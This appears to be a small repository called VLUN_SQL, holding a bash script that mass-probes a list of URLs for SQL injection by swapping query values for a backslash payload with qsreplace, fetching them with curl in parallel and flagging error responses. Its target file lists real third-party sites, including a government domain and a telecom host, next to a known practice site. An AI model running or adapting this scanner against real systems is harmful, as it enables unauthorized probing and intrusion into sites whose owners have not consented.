├── README.md ├── payload ├── sql.sh └── target /README.md: -------------------------------------------------------------------------------- 1 | # VLUN_SQL -------------------------------------------------------------------------------- /payload: -------------------------------------------------------------------------------- 1 | \ 2 | -------------------------------------------------------------------------------- /sql.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | for domain in $(cat $1) 3 | do 4 | echo "$domain" | qsreplace "$2" | xargs -P30 -n1 curl -s -k -L | grep "sql" &>/dev/null && echo -e " \033[0;31m[!]VULNERABLE \033[0;96mURL---> \033[0;35m$domain" || echo -e "\033[0;98mNOT VLUN \033[0;93mURL \033[0;97m$domain" | tee result 5 | 6 | done -------------------------------------------------------------------------------- /target: -------------------------------------------------------------------------------- 1 | https://land.gov.bd/?s=hello 2 | https://h28a.n1.ips.mtn.co.ug/eam/vib?id=1 3 | http://testphp.vulnweb.com/search.php?test=query 4 | --------------------------------------------------------------------------------